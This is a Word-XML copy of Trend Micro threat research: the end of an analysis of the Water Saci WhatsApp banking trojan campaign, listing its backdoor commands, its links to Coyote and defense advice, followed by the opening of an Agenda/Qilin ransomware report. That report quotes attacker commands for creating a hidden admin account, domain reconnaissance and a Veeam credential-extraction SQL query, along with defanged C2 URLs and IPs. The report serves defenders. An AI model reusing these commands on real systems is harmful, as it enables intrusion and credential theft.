name, and current user.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CMD Executes Windows command prompt commands with hidden window and captures output to temporary files.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>POWERSHELL Executes PowerShell commands with bypass execution policy and hidden window mode for advanced system operations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SCREENSHOT Captures full desktop screenshot using PowerShell and Windows Forms, saves as timestamped PNG file.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>TASKLIST Enumerates all running processes with PID, name, and memory usage via WMI queries.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>KILL Terminates specified processes by name using WMI process termination methods.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>LIST_FILES Performs directory enumeration showing files/folders with sizes, dates, and attributes up to 100 items.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>DOWNLOAD_FILE Downloads files from infected system using Base64 encoding with automatic chunking for large files.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>UPLOAD_FILE Uploads files to infected system with automatic directory creation and Base64 decoding.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>UPLOAD_FILE Uploads files from client to server using 30KB chunks with Base64 encoding for large file support.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>DELETE Removes specified files or folders with force deletion capabilities to bypass permissions.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>RENAME Renames files and folders with parameter validation and error handling for file system operations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>COPY Copies files or folders to specified destinations with overwrite capabilities and directory creation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>MOVE Moves files or folders between locations with automatic path resolution and error handling.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>FILE_INFO Retrieves detailed metadata including file size, creation date, modification date, and attributes.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SEARCH Searches for files matching specified patterns across directory trees with recursive traversal.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CREATE_FOLDER Creates new directories with full path validation and automatic parent directory creation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>REBOOT Initiates immediate system restart with 30-second delay using Windows shutdown command with force flag.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>SHUTDOWN Powers down the system completely with 30-second delay using shutdown command with force parameters.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>UPDATE Downloads and installs updated malware version from specified URL using batch file replacement method.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>CHECK_EMAIL Manually triggers immediate email check for new C&amp;C URLs and infrastructure updates.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 Instructions sent by the malware's C&amp;C server and their corresponding functions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Once a command has been executed, the backdoor prepares the results for transmission back to the command and control (C&amp;C) server using the EnviarResultado() function. This step includes sanitizing the output, removing unwanted control characters, and compressing whitespace. If the result exceeds the size limit, it is truncated before being URL-encoded. The data is then sent via an HTTP POST request, ensuring that attackers receive concise and organized feedback for each command issued.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33. Result transmission back to C&amp;C server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Water Saci evolution and possible links to Coyote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Water Saci shares similarities to Coote a stealthy banking trojan that spread which was first identified in 2024 and was later observed to propagate via WhatsApp in early 2025.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Water Saci and Coyote both exploit social engineering to reach Brazilian victims, and both campaign's tactics have evolved in parallel significantly: from compiled .NET banking trojans delivered via email and ZIP files, they evolved to use sophisticated, script-driven automation that hijacks browser sessions and leverages WhatsApp Web.</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infection methods and ongoing tactical evolution, along with the region- focused targeting indicate that Water Saci is likely linked to Coyote, and both campaigns operate within the same Brazilian cybercriminal ecosystem. Linking the Water Saci campaign to Coyote reveals a bigger picture that exhibits a significant shift in the banking trojan's propagation methods. Threat actors have transitioned from relying on traditional payloads to exploiting legitimate browser profiles and messaging platforms for stealthy, scalable attacks.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34. Water Saci campaign timeline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September 2022, Coyote emerged in Latin America through phishing campaigns, cleverly masking malicious ZIP archives as resume submissions. The infection chain followed a ZIP archive containing a LNK file, which executed an MSI installer, eventually dropping a DLL payload to establish remote access. By June 2023, Coyote shifted tactics, deploying the Squirrel ecosystem at the initial attack stage and distributing malware via spearphishing links rather than attachments. The use of NuGet packages in its second stage showcased an adaptable attack structure.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A major development appeared in February 2025, as Coyote expanded its propagation methods to include WhatsApp Web: an unusual vector for banking Trojans in the region at the time. Through automation of active WhatsApp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sessions, the malware mass-delivered ZIP files to contacts. Code obfuscation leveraged Donut tooling, and malicious browser extensions began monitoring user activity in both Brave and Chrome browsers.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September 2025, a self-propagating campaign surfaced that Trend Research identified as Water Saci with the malware SORVEPOTEL. The campaign highlighted by malicious ZIP files such as "RES-20250930_112057.zip". The attack now utilized modular architecture, delivering distinct payloads for WhatsApp hijacking and .NET-based infostealer functionality. Notably, it featured sophisticated overlay windows that closely mimicked banking interfaces, dynamically adapting and seamlessly extracting sensitive credentials.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October 2025, Trend Research found that the payload delivery techniques evolved further, relying on Visual Basic Script and PowerShell-based loaders instead of .NET binaries. This script-driven approach facilitated continued propagation and evasion of traditional security controls. Aspect Coyote SORVEPOTEL (September 2025) SORVEPOTEL (October 2025) Primary Infection Vector Phishing emails (ZIP w/ LNK/MSI) and later, direct malicious links Self-propagation via hijacked WhatsApp Web sessions, delivering ZIP files with LNK downloader Self-propagation via hijacked WhatsApp Web sessions, delivering ZIP files with VBS downloader Execution Chain Abuse of Squirrel installer and NodeJS; use of advanced Nim and Donut-based loaders Multi-stage PowerShell chain with reflective DLL loading and shellcode injection PowerShell script via fileless execution Persistence Methods Registry keys: UserInitMprLogonScript and Software\Microsoft\Windows\CurrentVersion\Run BAT script in Startup, registry modifications for autorun Registry and scheduled task creation (WinManagers.vbs in ProgramData) Evasion DLL side-loading, binary padding/obfuscation, XOR encryption, sandbox and anti-analysis, captcha Locale/region check, anti-debugging, detection of analysis tools, typosquatting domains Language check (Portuguese), debugger detection (OllyDbg, IDA, x32/x64dbg, etc.), self- deletion Payload Architecture Monolithic .NET banking trojan with all functions integrated into a single payload Modular design with two distinct payloads: a dedicated WhatsApp Propagation Module and a separate Banking Trojan Module Full-featured backdoor that uses IMAP for C&amp;C URL retrieval, has persistent polling (propagation pause/resume), detailed stat reporting, botnet capabilities Banking Trojan Functionality Monitors browser windows, keylogging, screen capture, and deploys fake overlay windows for credential theft Geolocation checks, advanced browser monitoring, and deploys highly sophisticated and interactive overlay windows with transparency effects No banking trojan functionality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2. A matrix that shows the similarities and evolution of Coyote and the SORVEPOTEL malware identified in the Water Saci campaign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Attackers who once relied on noisy, file-based banking Trojans have quietly moved toward low-artifact, browser-state abuse, and WhatsApp Web became the preferred delivery highway. The evolution can be read as three distinct waves: a noisy compiled-trojan phase, a hybrid automation phase with browser tooling, and a current script-first phase that weaponizes live WhatsApp sessions.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First Wave: Compiled Banking Trojan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Attackers initiated campaigns with phishing emails delivering ZIP archives containing LNK or EXE files. Execution chains typically involved LNK files launching PowerShell stagers, which deployed compiled .NET banking Trojan payloads. These Trojans utilized Donut-style in-memory loaders and DLL side- loading to inject malicious code into legitimate processes. Persistence was established through registry autorun entries and modifications to system startup folders. Evasion techniques included binary padding, obfuscation, and basic sandbox or anti-analysis checks.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Second Wave: Automation &amp; Browser Tooling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Subsequent campaigns integrated automation, blending phishing with widespread distribution via web and messaging platforms. Delivered ZIP/LNK files triggered PowerShell or BAT scripts that launched .NET payloads incorporating browser automation frameworks like ChromeDriver and Selenium. Additional persistence mechanisms featured BAT scripts in startup folders and registry alterations. Attack chains added locale or region checking, anti-debugging routines, and typosquatting domains. Malware capabilities expanded to session hijacking, keylogging, automated account takeover, and dynamic phishing overlays, often mimicking legitimate user behaviors.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Third Wave: Script-Based Attack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Recent attacks leverage fileless chains via WhatsApp-distributed ZIPs containing obfuscated VBS scripts that run PowerShell payloads in memory. The malware installs browser automation, injects WA-JS into active sessions, and hijacks Chrome profiles to harvest contacts and spread malicious ZIPs. Persistence relies on WMI mutexes, scheduled tasks, ProgramData scripts, and registry changes. Evasion includes language checks, anti-debugging, self-deletion, and automation flags. C2 uses HTTP polling and IMAP/email fallback, enabling resilient communications and telemetry. Payloads provide full backdoor access and automated, personalized propagation.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These evolving attack waves illustrate the rapid innovation and increasing sophistication of the malware targeting Brazil's financial and messaging platforms. While the Water Saci and Coyote campaigns share notable technical overlaps and approaches that highly suggest the two are linked, it remains to be seen if they are definitively operated by the same threat actor. Ongoing monitoring and analysis are essential as attackers adapt their methods, and Trend Research continues to investigate these connections for a deeper understanding of the threat landscape. Conclusion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 Research's continuous monitoring of Water Saci's active campaign shows that the threat actors behind it are aggressive both in quantity and quality. While the initial investigation of the Water Saci campaign showed how fast the malware's self-propagation facilities are, the new attack chain demonstrates a significant evolution in adversarial capabilities.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Our analysis shows that threat actors behind Water Saci leverage an email- based C&amp;C infrastructure utilizing IMAP connections to terra[.]com[.]br accounts, rather than traditional HTTP-based communication channels. This methodology, coupled with a multi-vector persistence strategy, ensures the malware's resilience across system reboots and diverse user environments.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attack chain also features checks to evade detection, analysis, and restrict execution to designated targets, further enhancing operational stealth. The malware also enables attackers to collect detailed campaign statistics, which facilitates actionable intelligence on success rates, victim profiles, and targeted outreach. This potentially enables the threat actors to more strategically plan and measure performance.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notably, the remote C&amp;C system offers advanced control, permitting threat actors to pause, resume, and oversee the campaign in real time, effectively transforming the infected endpoints into a coordinated botnet for dynamic operations.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Apart from the sophisticated tactics and techniques employed by the attackers, the success of this campaign in Brazil can also be attributed to the high adoption of the instant messaging platform leveraged by the cybercriminals in the country. It is critical that companies follow defense recommendations to secure their enterprises and enhance their detection capabilities to proactively mitigate such sophisticated threats.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 Research also recommends that enterprises review their policies and educate employees to prevent being victimized by banking Trojans that rely on social engineering to propagate.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abuse of the instant messaging platform with a campaign that exhibits the modular architecture revealed in the Water Saci investigation suggests the high possibility of additional payloads being used and propagated. Constant vigilance is imperative for enterprises to stay on top of these evolving threats.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Defense recommendations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 minimize the risks associated with the Water Saci campaign, Trend recommends several practical initial defense items: Disable Auto-Downloads on WhatsApp. Turn off automatic downloads of media and documents in WhatsApp settings to reduce accidental exposure to malicious files.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Control File Transfers on Personal Apps. Use endpoint security or firewall policies to block or restrict file transfers through personal applications like WhatsApp, Telegram, or WeTransfer on company-managed devices. If your organization supports BYOD, enforce strict app whitelisting or containerization to protect sensitive environments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enhance User Awareness. The victimology of the Water Saci campaign suggests that attackers are targeting enterprises. Organizations are recommended to provide regular security training to help employees recognize the dangers of downloading files via messaging platforms. Advise users to avoid clicking on unexpected attachments or suspicious links, even when they come from known contacts, and promote the use of secure, approved channels for transferring business documents.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enhance Email and Communication Security Controls. Restrict access to personal email and messaging apps on corporate devices. Use web and email gateways with URL filtering to block known malicious C2 and phishing domains.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce Multi-Factor Authentication (MFA) and Session Hygiene. Require MFA for all cloud and web services to prevent session hijacking. Advise users to log out after using messaging apps and regularly clear browser cookies and tokens.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deploy Advanced Endpoint Security Solutions. Use Trend Micro endpoint security platforms (such as Apex One or Vision One) to detect and block suspicious script-based attacks, fileless malware, and automation abuse. Enable behavioral monitoring to catch unauthorized VBS/PowerShell execution, browser profile alterations, and lateral movement attempts related to WhatsApp and similar threats.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Implementing these recommendations will help organizations and individuals better defend against malware threats delivered through messaging applications. Proactive security with Trend Vision OneTM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 Vision OneTM is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management and security operations, delivering robust layered protection across on-premises, hybrid, and multi- cloud environments.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following sections contain Trend Vision One insights, reports, and queries mentioned in the previous blog with additional information from this report. Trend Vision One TM Threat Intelligence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 stay ahead of evolving threats, Trend customers can access Trend Vision OneTM Threat Insights which provides the latest insights from Trend TM Research on emerging threats and threat actors.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 Vision One Threat Insights Threat Actors: Water Saci Emerging Threats: Evolving WhatsApp Script-Based Attack Chain Leveraging VBS and PowerShell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 Vision One Intelligence Reports (IOC Sweeping) Evolving WhatsApp Script-Based Attack Chain Leveraging VBS and PowerShell Hunting Queries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 Vision One Search App</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 Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Detect suspicious ZIP file creation that matches WhatsApp-related campaign names (Orcamento*.zip, Bin.zip) and deployment of VBS files for persistence. eventSubId:101 AND (objectFilePath:Orcamento.zip OR objectFilePath:*Bin.zip OR objectFilePath:*WinManagers.vbs) Indicators of Compromise (IoCs)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Indicators of Compromise can be found here.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
        <w:t>Trend Micro 2025.10.27 12:05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>https://www.trendmicro.com/en_us/research/25/j/active-water-saci-campaign-whatsapp-update.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>***</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB1B73" w:rsidRDefault="00EB1B73" w:rsidP="00EB1B73">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Agenda Ransomware Deploys Linux Variant on Windows Systems Through Remote Management Tools and BYOVD Techniques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TrendTM Research identified a sophisticated Agenda ransomware attack that deployed a Linux variant on Windows systems. This cross-platform execution can make detection challenging for enterprises.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Jacob Santos, Junestherry Dela Cruz, Sarah Pearl Camiling, Sophia Nilette Robles, Maristel Policarpio, Raymart Yambot Oct 23, 2025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Key takeaways: TrendTM Research identified Agenda ransomware group, known as Qilin, deploying a Linux-based ransomware binary on Windows hosts by abusing legitimate remote management and file transfer tools. The cross-platform execution sidesteps Windows-centric detections and security solutions, including conventional endpoint detection and response platforms.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>The technique enables low-noise operations that can disable recovery options through the targeted theft of backup credentials and neutralize endpoint defenses via BYOVD attack.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Agenda has affected 591 victims across 58 countries since January 2025, primarily targeting organizations in developed markets and high-value industries. Most victims were in the United States, Canada, and the United Kingdom, with manufacturing, technology, financial services, and healthcare among the hardest hit.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Any environment that uses remote access platforms, centralized backup solutions, or hybrid Windows/Linux infrastructures could be at risk. Enterprises are encouraged to limit the use of remote access tools to authorized hosts and continuously monitor for unusual activity.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Trend Vision OneTM detects and blocks the specific IoCs mentioned in this blog, and offers customers access to hunting queries, threat insights, and intelligence reports related to Agenda ransomware. For more security best practices, see the guidance below.</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TrendTM Research identified a sophisticated ransomware attack by the Agenda group that deployed their Linux ransomware variant on Windows systems. This follows a similar attack observed last June 2025, where MeshAgent and MeshCentral was used for deployment. In this recent incident, the threat actors utilized a novel deployment method combining WinSCP for secure file transfer and Splashtop Remote for executing the Linux ransomware binary on Windows machines.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attack chain demonstrated advanced techniques including usage of Bring Your Own Vulnerable Driver (BYOVD) for defense evasion and deployment of multiple SOCKS proxy instances across various system directories to obfuscate command-and-control (C&amp;C) traffic. The attackers abused legitimate tools, specifically installing AnyDesk through ATERA Networks' remote monitoring and management (RMM) platform and ScreenConnect for command execution. It abuses Splashtop for the final ransomware execution. They specifically targeted Veeam backup infrastructure using specialized credential extraction tools, systematically harvesting credentials from multiple backup databases to compromise the organization's disaster recovery capabilities before deploying the ransomware payload.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attack challenges traditional Windows-focused security controls. The deployment of Linux ransomware on Windows systems demonstrates how threat actors are adapting to bypass endpoint detection systems not configured to detect or prevent Linux binaries executing through remote management channels.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combination of BYOVD techniques, fake CAPTCHA social engineering, and the strategic targeting of backup infrastructure shows an approach of ensuring successful ransomware deployment while eliminating recovery options. The use of legitimate tools and cross-platform execution methods makes detection significantly more challenging. Organizations must urgently reassess their security posture to account for these unconventional attack vectors and implement enhanced monitoring of remote management tools and backup system access.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Impact and victimology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Agenda emerged as one of the top ransomware groups in 2025, demonstrating unprecedented operational tempo and global reach. Analysis of their data leak site since January reveals a ransomware-as-a-service (RaaS) operation that systematically targeted organizations across economically developed nations, with a particular focus on the United States, Western Europe, and Japan. The victimology pattern shows opportunistic targeting across multiple high-value sectors, particularly manufacturing, technology, financial services, and healthcare - industries characterized by operational sensitivity, data criticality, and higher likelihood of ransom payment.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 Geographic and sectoral distribution of victims since January 2025 based on the Agenda ransomware group's leak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The group's willingness to target critical infrastructure, including healthcare facilities and public sector entities, emphasizes their lack of ethical constraints and prioritization of financial gain over potential societal impact. Figure 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>illustrates the geographic and sectoral distribution of Agenda's 2025 victims as documented on their data leak site, providing a visual representation of the threat actor's extensive global reach and multi-industry impact.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Attack chain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2. The Agenda ransomware infection chain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Initial Access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 identified that multiple endpoints within the compromised environment had connected to malicious fake CAPTCHA pages hosted on Cloudflare R2 storage infrastructure. These pages presented convincing replicas of legitimate Google CAPTCHA verification prompts: hxxps://pub-959ff112c2eb41ce8f7b24e38c9b4f94[.]r2[.]dev/Google-Captcha- Continue-Latest-J-KL-3[.]html hxxps://pub-2149a070e76f4ccabd67228f754768dc[.]r2[.]dev/I-Google-Captcha- Continue-Latest-27-L-1[.]html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3. Screenshot of the webpage hosted on Cloudflare R2, displaying a fake Google CAPTCHA verification prompt designed to trick users into executing malicious commands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Analysis of the embedded obfuscated JavaScript within these fake CAPTCHA pages revealed a multistage payload delivery system that initiated downloads from secondary command-and-control servers: 45[.]221[.]64[.]245/mot/ 104[.]164[.]55[.]7/231/means.d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 assess that the threat actors likely initiated their attack campaign through a sophisticated social engineering scheme involving these fake CAPTCHA pages. The pages appear to have delivered information stealers to the compromised endpoints, which subsequently harvested authentication tokens, browser cookies, and stored credentials from the infected systems. The presence of valid credentials used throughout the attack chain strongly suggests that these stolen credentials provided the Agenda threat actors with the valid accounts necessary for their initial access into the environment. This assessment is further supported by the attackers' ability to bypass multifactor authentication (MFA) and move laterally using legitimate user sessions, indicating they possessed harvested credentials rather than relying on traditional exploitation techniques.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Privilege Escalation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attackers deployed a SOCKS proxy DLL to facilitate remote access and command execution. This proxy was loaded directly into memory using Windows' legitimate rundll32.exe process, making detection more difficult.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C:\Windows\System32\cmd.exe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C:\Windows\System32\rundll32.exe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rundll32.exe socks64.dll,rundll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C:\ProgramData\Veeam\socks64.dll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backdoor administrative account named "Supportt" was created to ensure persistent elevated access. This account name was likely chosen to blend in with legitimate support accounts commonly found in enterprise environments. net user Supportt * * * * * /add net localgroup Administrators Supportt /add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legitimate administrator account password was also reset to maintain control and prevent legitimate administrators from regaining access. net user Administrator * * * * *</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Discovery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Extensive reconnaissance was conducted to map the network infrastructure. The attackers abused ScreenConnect's legitimate remote management capabilities to execute discovery commands through temporary command scripts, systematically enumerating domain trusts and identifying privileged accounts while appearing as normal administrative activity: nltest /domain_trusts net group "domain admins" /domain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Network scanning tools were deployed across multiple locations to discover additional systems, services, and potential lateral movement targets. The NetScan utility was executed from both the Desktop and Documents folders to perform comprehensive network enumeration.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>C:\Users\Administrator.&lt;REDACTED&gt;\Desktop\netscan.exe C:\Users\Administrator.&lt;REDACTED&gt;\Documents\netscan.exe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Remote management tools were strategically installed through legitimate RMM platforms to blend with normal IT operations. ATERA Networks' agent was leveraged to deploy AnyDesk version 9.0.5, while ScreenConnect provided an additional command execution vector. This dual-RMM approach provided the attackers with redundant remote access capabilities that appeared legitimate to security monitoring systems, allowing them to maintain persistent access even if one tool was discovered and removed.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Credential Access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attackers specifically targeted Veeam backup infrastructure to harvest credentials, recognizing that backup systems often store credentials for accessing multiple systems across the enterprise. PowerShell scripts were executed with base64-encoded payloads to extract and decrypt stored credentials from Veeam databases, via powershell.exe -e [base64-encoded payload].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When decoded, these scripts revealed systematic targeting of multiple Veeam backup databases, each containing credentials for different segments of the infrastructure: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SQL Database Queries: SELECT [user_name], [password] FROM [VeeamBackup].[dbo].[Credentials] Targeted tables: Credentials, BackupRepositories, WinServers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Compromised Account Types: Domain administrator accounts: DOMAIN\admin-* * *, DOMAIN\da-backup-* * * Service accounts: svc-sql-* * *, DOMAIN\veeam-svc-* * *, svc-exchange-* * * Local administrators: SERVER01\Administrator, SERVER02\localadmin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Script Details: Decryption key found in script: 0jmz9Hrgy08rc0XrNpQ* * *[REDACTED]* * * Affected systems: Domain controllers, Exchange servers, SQL databases, file servers, backup repositories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approach provided the attackers with a comprehensive set of credentials for remote systems, domain controllers, and critical servers stored within the backup infrastructure.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Defense Evasion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attackers deployed sophisticated anti-analysis tools to evade security solutions. Further probe confirmed that both 2stX.exe and Or2.exe utilize the eskle.sys driver for anti-AV capabilities through a BYOVD attack: C:\Users\Administrator.&lt;REDACTED&gt;\Downloads\2stX.exe C:\Users\Administrator.&lt;REDACTED&gt;\Downloads\Or2.exe C:\Users\Administrator.&lt;REDACTED&gt;\Downloads\2stX\eskle.sys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eskle.sys driver was utilized to disable security solutions, terminate processes, and evade detection. Although these files could have been downloaded or copied onto the machine earlier, the origin of the eskle.sys driver is unclear. Its digital signature lists 